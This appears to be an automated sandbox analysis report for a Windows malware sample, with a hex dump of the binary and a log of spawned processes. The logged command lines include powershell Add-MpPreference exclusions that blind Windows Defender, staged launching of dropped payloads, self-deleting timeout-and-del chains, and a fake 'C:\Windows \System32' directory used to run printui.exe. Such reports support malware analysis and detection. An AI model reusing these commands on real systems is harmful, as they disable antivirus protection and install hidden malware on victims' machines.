                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$l???,>`?,>?,>?)>?)>?)>?,>??V?(>?(z??(>?Rich?PEd
                        2024-08-21 07:39:52 UTC1378INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 83 ec 48 48 8d 4c 24 20 e8 c2 ff ff ff 48 8d 15 a3 31 e7 00 48 8d 4c 24 20 e8 c1 40 02 00 cc 40 53 48 83 ec 20 48 8b d9 48 8b c2 48 8d 0d 45 d4 03 00 0f 57 c0 48 8d 53 08 48 89 0b 48 8d 48 08 0f 11 02 e8 d3 3d 02 00 48 8d 05 60 bb 05 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc 40 53 48 83 ec 20 48 8b d9 48 8b c2 48 8d 0d 05 d4 03 00 0f 57 c0 48 8d 53 08 48 89 0b 48 8d 48 08 0f 11 02 e8 93 3d 02 00 48 8d 05 00 d4 03 00 48 89 03 48 8b c3 48 83 c4 20 5b c3 cc cc cc cc 48 83 ec 28 48 8d 0d 7d 49 06 00 e8 e8 05 02 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 53 48 83 ec 40 48 8b 05 83 3e e7 00 48 33 c4 48 89 44 24 30 48 83 7a 18 0f 4c 8b c2 48 8b d9 76 03 4c 8b 02 48 8d 51 08 4c 89 44 24 20 48 8d 05
                        Data Ascii: HHHL$ H1HL$ @@SH HHHEWHSHHH=H`HHH [@SH HHHWHSHHH=HHHH [H(H}I@SH@H>H3HD$0HzLHvLHQLD$ H
                        2024-08-21 07:39:52 UTC1378INData Raw: 48 89 07 48 8d 05 52 b7 05 00 0f 10 43 18 48 8b 5c 24 30 48 89 07 48 8b c7 0f 11 47 18 48 83 c4 20 5f c3 cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b da 48 8d 05 e4 ce 03 00 48 89 01 48 8d 51 08 48 8b f9 0f 57 c0 0f 11 02 48 8d 4b 08 e8 6f 38 02 00 48 8d 05 e4 b6 05 00 48 89 07 48 8b c7 0f 10 43 18 48 8b 5c 24 30 0f 11 47 18 48 83 c4 20 5f c3 cc cc cc 48 8b 09 e9 18 f9 01 00 cc cc cc cc cc cc cc cc 48 8d 05 59 44 06 00 c3 cc cc cc cc cc cc cc cc 40 53 48 83 ec 30 41 8b c8 48 8b da e8 8f 06 02 00 0f 57 c0 49 c7 c0 ff ff ff ff 0f 11 03 48 c7 43 10 00 00 00 00 48 c7 43 18 00 00 00 00 66 90 49 ff c0 42 80 3c 00 00 75 f6 48 8b d0 48 8b cb e8 fb ce 00 00 48 8b c3 48 83 c4 30 5b c3 cc cc 40 53 48 83 ec 20 48 8b d9 f6 c2 01 74 0a ba 10 00 00 00
                        Data Ascii: HHRCH\$0HHGH _H\$WH HHHHQHWHKo8HHHCH\$0GH _HHYD@SH0AHWIHCHCfIB<uHHHH0[@SH Ht
                        2024-08-21 07:39:52 UTC1378INData Raw: 02 75 f7 48 8d 4c 24 48 e8 6d ca 00 00 48 8d 44 24 48 8b ce bf 01 00 00 00 eb 27 66 0f 6f 0d 57 b2 e6 00 48 8d 44 24 28 0f 57 c0 b9 02 00 00 00 0f 11 44 24 28 40 88 74 24 28 8b fe f3 0f 7f 4c 24 38 0f 10 00 0f 10 48 10 0f 11 03 0f 11 4b 10 48 89 70 10 48 c7 40 18 0f 00 00 00 40 88 30 48 8b b4 24 90 00 00 00 85 c9 74 39 48 8b 54 24 40 48 83 fa 0f 76 2e 48 8b 4c 24 28 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 15 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 53 e8 36 16 02 00 85 ff 74 39 48 8b 54 24 60 48 83 fa 0f 76 2e 48 8b 4c 24 48 48 ff c2 48 8b c1 48 81 fa 00 10 00 00 72 15 48 8b 49 f8 48 83 c2 27 48 2b c1 48 83 c0 f8 48 83 f8 1f 77 16 e8 f9 15 02 00 48 8b c3 48 8b 9c 24 98 00 00 00 48 83 c4 70 5f c3 e8 8b 8f 02 00 cc cc cc 48 89 5c 24 10
                        Data Ascii: uHL$HmHD$H'foWHD$(WD$(@t$(L$8HKHpH@@0H$t9HT$@Hv.HL$(HHHrHIH'H+HHwS6t9HT$`Hv.HL$HHHHrHIH'H+HHwHH$Hp_H\$
                        2024-08-21 07:39:52 UTC1378INData Raw: 00 00 e8 79 11 02 00 48 8b f0 48 89 45 67 48 8b 4b 08 48 85 c9 74 0f 48 8b 59 28 48 85 db 75 0d 48 8d 59 30 eb 07 48 8d 1d 48 3a 06 00 33 d2 48 8d 4d a7 e8 58 f2 01 00 90 4c 89 75 af c6 45 b7 00 4c 89 75 bf c6 45 c7 00 4c 89 75 cf 66 44 89 75 d7 4c 89 75 df 66 44 89 75 e7 4c 89 75 ef c6 45 f7 00 4c 89 75 ff c6 45 07 00 48 85 db 0f 84 fa 00 00 00 48 8b d3 48 8d 4d a7 e8 a4 f9 01 00 90 44 89 76 08 48 8d 05 5c ac 05 00 48 89 06 48 8d 4d 0f e8 80 05 02 00 0f 10 00 0f 10 48 10 0f 11 46 10 0f 11 4e 20 48 8d 4d 0f e8 a0 08 02 00 0f 10 08 0f 10 50 10 f2 0f 10 40 20 8b 48 28 0f 11 4e 30 0f 11 56 40 f2 0f 11 46 50 89 4e 58 48 89 37 48 8d 4d a7 e8 b5 f9 01 00 48 8b 4d ff 48 85 c9 74 05 e8 ef 7d 02 00 4c 89 75 ff 48 8b 4d ef 48 85 c9 74 05 e8 dd 7d 02 00 4c 89 75 ef
                        Data Ascii: yHHEgHKHtHY(HuHY0HH:3HMXLuELuELufDuLufDuLuELuEHHHMDvH\HHMHFN HMP@ H(N0V@FPNXH7HMHMHt}LuHMHt}Lu
                        2024-08-21 07:39:52 UTC1378INData Raw: 40 48 8b ac 24 80 00 00 00 48 8b c3 48 8b 4c 24 30 48 33 cc e8 dd 0b 02 00 48 83 c4 48 41 5e 5f 5e 5b c3 cc cc cc 48 89 5c 24 08 57 48 83 ec 20 83 79 20 00 48 8d 05 4b a7 05 00 48 89 01 8b fa 48 8b d9 74 09 48 8b 49 18 e8 28 79 02 00 48 8b 4b 28 e8 1f 79 02 00 48 8d 05 d8 c4 03 00 48 89 03 40 f6 c7 01 74 0d ba 60 00 00 00 48 8b cb e8 a2 0b 02 00 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc cc cc 40 53 48 81 ec a0 00 00 00 0f 29 b4 24 90 00 00 00 48 8b d9 48 89 4c 24 20 41 0f 10 30 0f 57 c0 0f 11 44 24 30 0f 57 c9 f3 0f 7f 4c 24 40 49 c7 c0 ff ff ff ff 49 ff c0 42 80 3c 02 00 75 f6 48 8d 4c 24 30 e8 e7 be 00 00 90 48 8d 54 24 30 48 8d 4c 24 70 e8 87 82 00 00 66 0f 7f 74 24 20 4c 8b c0 48 8d 54 24 20 48 8d 4c 24 50 e8 1f ec ff ff 48 8b d0 48 8b cb e8 44
                        Data Ascii: @H$HHL$0H3HHA^_^[H\$WH y HKHHtHI(yHK(yHH@t`HHH\$0H _@SH)$HHL$ A0WD$0WL$@IIB<uHL$0HT$0HL$pft$ LHT$ HL$PHHD
                        2024-08-21 07:39:52 UTC1378INData Raw: 40 c1 e9 12 83 c1 19 f7 e1 d1 ea 83 ea 01 89 54 24 34 0f 88 fc 01 00 00 45 2b d9 44 89 4c 24 38 41 83 eb 78 4c 89 44 24 40 49 8b d8 44 89 5c 24 28 48 c1 e3 08 48 8d 3d 78 d3 ff ff 42 0f b7 8c 57 a0 a3 e6 00 8d 04 d2 03 ca 48 89 5c 24 60 89 4c 24 3c 89 44 24 30 48 63 c1 48 bd 97 a5 b4 36 41 5f 70 89 4c 8d 14 40 4a 8b 84 d7 00 13 04 00 48 f7 e3 4a 8b 84 d7 08 13 04 00 48 8b ca 48 f7 e3 4c 8b c0 4c 8b ca 4a 8b 84 d7 10 13 04 00 49 03 c8 48 f7 e3 49 3b c8 41 8b cb 48 8b f8 49 13 f9 49 b9 31 30 95 f8 88 0a 68 31 48 3b f8 49 8b c1 48 83 d2 00 48 0f ad d7 4c 8b c2 48 f7 e7 49 d3 e8 48 8b c5 48 8b ca 48 f7 e7 4c 8b d0 48 8b da 49 8b c1 49 f7 e0 4c 8b c8 4c 8b da 48 8b c5 49 f7 e0 4d 8d 04 09 4b 8d 0c 10 48 89 54 24 68 49 3b ca 48 83 d0 00 4d 3b c1 49 13 c3 48 03
                        Data Ascii: @T$4E+DL$8AxLD$@ID\$(HH=xBWH\$`L$<D$0HcH6A_pL@JHJHHLLJIHI;AHII10h1H;IHHLHIHHHLHIILLHIMKHT$hI;HM;IH
                        2024-08-21 07:39:52 UTC1378INData Raw: 89 fc ff ff 45 85 c9 75 15 44 8b c5 ba 30 00 00 00 48 8b ce e8 f9 92 03 00 48 03 f5 eb 53 4c 8b c6 41 8b d1 41 8b cb e8 f6 8a 00 00 48 03 f5 eb 40 83 7c 24 50 00 76 26 49 8b c7 41 8d 6b 01 48 2b c6 48 3b c5 0f 8c 42 fc ff ff 4c 8b c6 41 8b d1 41 8b cb e8 a9 f7 ff ff 48 03 f5 eb 13 49 3b f7 0f 84 26 fc ff ff 41 80 c1 30 44 88 0e 48 ff c6 85 ff 74 34 48 8b 54 24 58 48 8b c6 48 3b f2 74 22 0f b6 48 ff 48 ff c8 80 f9 2e 74 11 80 f9 39 0f 85 99 00 00 00 c6 00 30 bf 01 00 00 00 48 3b c2 75 de c6 00 31 ff c3 44 8b c3 49 8b c7 41 f7 d8 44 0f 48 c3 33 c9 41 83 f8 64 0f 9d c1 48 2b c6 48 83 c1 04 48 3b c1 0f 8c be fb ff ff 85 db c6 06 65 b8 2d 00 00 00 4c 8d 0d 72 cd ff ff b9 2b 00 00 00 0f 49 c1 88 46 01 41 83 f8 64 7c 56 b8 67 66 66 66 41 f7 e8 c1 fa 02 8b c2 c1
                        Data Ascii: EuD0HHSLAAH@|$Pv&IAkH+H;BLAAHI;&A0DHt4HT$XHH;t"HH.t90H;u1DIADH3AdH+HH;e-Lr+IFAd|VgfffA
                        2024-08-21 07:39:52 UTC1378INData Raw: 44 8b ca 41 f7 e6 41 c1 e9 03 8b fa c1 ef 03 41 3b f9 76 51 0f 1f 40 00 0f 1f 84 00 00 00 00 00 b8 cd cc cc cc 45 8b d1 41 f7 e0 ff c3 c1 ea 03 0f b6 c2 c0 e0 02 8d 0c 10 b8 cd cc cc cc 02 c9 44 2a c1 45 0f b6 d8 44 8b c2 41 f7 e1 b8 cd cc cc cc 44 8b ca f7 e7 41 c1 e9 03 8b fa c1 ef 03 41 3b f9 77 bb 45 3b c2 e9 24 01 00 00 b8 cd cc cc cc 41 f7 e2 b8 cd cc cc cc 8b fa 41 f7 e6 c1 ef 03 44 8b f2 41 c1 ee 03 44 3b f7 76 6d 66 90 8d 0c bf 41 0f b6 c7 03 c9 44 8b ce 44 3b d1 8b ce 44 8b d7 44 0f 44 c8 45 84 db 40 0f b6 c5 45 0f b6 f9 0f 44 c8 b8 cd cc cc cc 41 f7 e0 0f b6 e9 ff c3 c1 ea 03 0f b6 c2 c0 e0 02 8d 0c 10 b8 cd cc cc cc 02 c9 44 2a c1 45 0f b6 d8 44 8b c2 f7 e7 b8 cd cc cc cc 8b fa 41 f7 e6 c1 ef 03 44 8b f2 41 c1 ee 03 44 3b f7 77 95 45 84 ff 74
                        Data Ascii: DAAA;vQ@EAD*EDADAA;wE;$AADAD;vmfADD;DDDE@EDAD*EDADAD;wEt
                        2024-08-21 07:39:52 UTC1378INData Raw: c2 49 f7 e3 49 c1 e8 06 4c 2b d2 49 d1 ea 4c 03 d2 49 c1 ea 06 4d 3b c2 76 32 48 8b c1 49 8b f0 49 f7 e1 49 8b c9 4d 8b da 48 2b ca bb 02 00 00 00 48 d1 e9 48 03 ca 48 c1 e9 06 6b c1 64 44 2b c8 41 83 f9 32 4c 8b c9 40 0f 93 c5 49 8b c4 48 f7 e6 49 8b c4 4c 8b c2 49 f7 e3 49 c1 e8 03 48 8b ca 48 c1 e9 03 4c 3b c1 76 44 0f 1f 00 49 8b c4 4c 8b d9 49 f7 e1 48 c1 ea 03 8d 04 92 03 c0 44 2b c8 49 8b c4 41 83 f9 05 4c 8b ca 40 0f 93 c5 ff c3 49 f7 e0 49 8b c4 4c 8b c2 48 f7 e1 49 c1 e8 03 48 8b ca 48 c1 e9 03 4c 3b c1 77 bf 4d 3b cb 0f 84 3d 01 00 00 40 84 ed 0f 84 39 01 00 00 e9 2f 01 00 00 49 8b c4 48 f7 e6 49 8b c4 4c 8b f2 49 f7 e3 49 c1 ee 03 48 8b f2 48 c1 ee 03 4c 3b f6 76 72 66 0f 1f 84 00 00 00 00 00 8d 0c b6 49 8b c4 49 f7 e1 03 c9 41 0f b6 c7 48 c1
                        Data Ascii: IIL+ILIM;v2HIIIMH+HHHkdD+A2L@IHILIIHHL;vDILIHD+IAL@IILHIHHL;wM;=@9/IHILIIHHL;vrfIIAH


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:3
                        Start time:03:39:40
                        Start date:21/08/2024
                        Path:C:\Users\user\Desktop\Ld0f3NDosJ.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\Ld0f3NDosJ.exe"
                        Imagebase:0x7ff646e40000
                        File size:440'832 bytes
                        MD5 hash:00948444F3E248047722667419D54205
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:03:39:45
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:7
                        Start time:03:39:45
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:8
                        Start time:03:39:45
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:12
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:13
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:14
                        Start time:03:40:02
                        Start date:21/08/2024
                        Path:C:\Users\user\Desktop\pyld64.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc8e0000
                        File size:15'180'800 bytes
                        MD5 hash:43BCE45D873189F9AE2767D89A1C46E0
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 18%, ReversingLabs
                        • Detection: 65%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:16
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\Ld0f3NDosJ.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:17
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:18
                        Start time:03:40:03
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate
                        Has exited:true

                        General

                        Target ID:19
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:20
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7934f0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:21
                        Start time:03:40:05
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:22
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:23
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:24
                        Start time:03:40:10
                        Start date:21/08/2024
                        Path:C:\Windows\System32\usvcinsta64.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff6b8fa0000
                        File size:14'693'888 bytes
                        MD5 hash:11DDC0A34BAC7AB099D2EE8D9817BF58
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 58%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:25
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:26
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:27
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
                        Imagebase:0x7ff6d8670000
                        File size:32'768 bytes
                        MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:28
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:29
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:30
                        Start time:03:40:11
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:32
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:33
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:34
                        Start time:03:40:15
                        Start date:21/08/2024
                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):false
                        Commandline:powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'"
                        Imagebase:0x7ff6e3d50000
                        File size:452'608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:36
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c mkdir "\\?\C:\Windows \System32"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:37
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:38
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c start "" "C:\Windows \System32\printui.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:39
                        Start time:03:40:18
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:40
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows \System32\printui.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Windows \System32\printui.exe"
                        Imagebase:0x7ff68c620000
                        File size:64'000 bytes
                        MD5 hash:2FC3530F3E05667F8240FC77F7486E7E
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Antivirus matches:
                        • Detection: 0%, ReversingLabs
                        Has exited:true

                        General

                        Target ID:41
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c timeout /t 10 /nobreak && del "C:\Windows\System32\usvcinsta64.exe"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:42
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\cmd.exe
                        Wow64 process (32bit):false
                        Commandline:cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath '%SystemDrive%\Windows \System32'; Add-MpPreference -ExclusionPath '%SystemDrive%\Windows\System32';"
                        Imagebase:0x7ff7fc950000
                        File size:289'792 bytes
                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:43
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:44
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff66e660000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Has exited:true

                        General

                        Target ID:45
                        Start time:03:40:19
                        Start date:21/08/2024
                        Path:C:\Windows\System32\timeout.exe
                        Wow64 process (32bit):false
                        Commandline:timeout /t 10 /nobreak
